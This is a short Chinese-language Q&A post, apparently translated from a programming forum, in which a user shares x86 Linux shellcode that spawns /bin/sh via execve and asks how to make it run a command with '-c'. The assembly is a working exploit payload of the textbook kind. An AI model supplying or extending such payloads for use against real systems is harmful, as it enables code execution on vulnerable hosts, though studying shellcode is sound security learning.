【发布时间】:2011-12-13 09:59:53
【问题描述】:
我有一些基本的shellcode:
BITS 32
jmp short callit ; jmp trick as explained above
doit:
pop esi ; esi now represents the location of our string
xor eax, eax ; make eax 0
mov byte [esi + 7], al ; terminate /bin/sh
lea ebx, [esi] ; get the adress of /bin/sh and put it in register ebx
mov long [esi + 8], ebx ; put the value of ebx (the address of /bin/sh) in AAAA ([esi +8])
mov long [esi + 12], eax ; put NULL in BBBB (remember xor eax, eax)
mov byte al, 0x0b ; Execution time! we use syscall 0x0b which represents execve
mov ebx, esi ; argument one... ratatata /bin/sh
lea ecx, [esi + 8] ; argument two... ratatata our pointer to /bin/sh
lea edx, [esi + 12] ; argument three... ratataa our pointer to NULL
int 0x80
callit:
call doit ; part of the jmp trick to get the location of db
db '/bin/sh#AAAABBBB'
但是假设我想添加一些命令作为 shell 的参数。因此,例如要创建一个新文件,我会执行类似 /bin/sh -c 'touch "filepath" 但我有点纠结于如何更改我的 shellcode 来做到这一点。
谢谢, 塞巴
【问题讨论】:
-
先学汇编再开始写shellcode?span>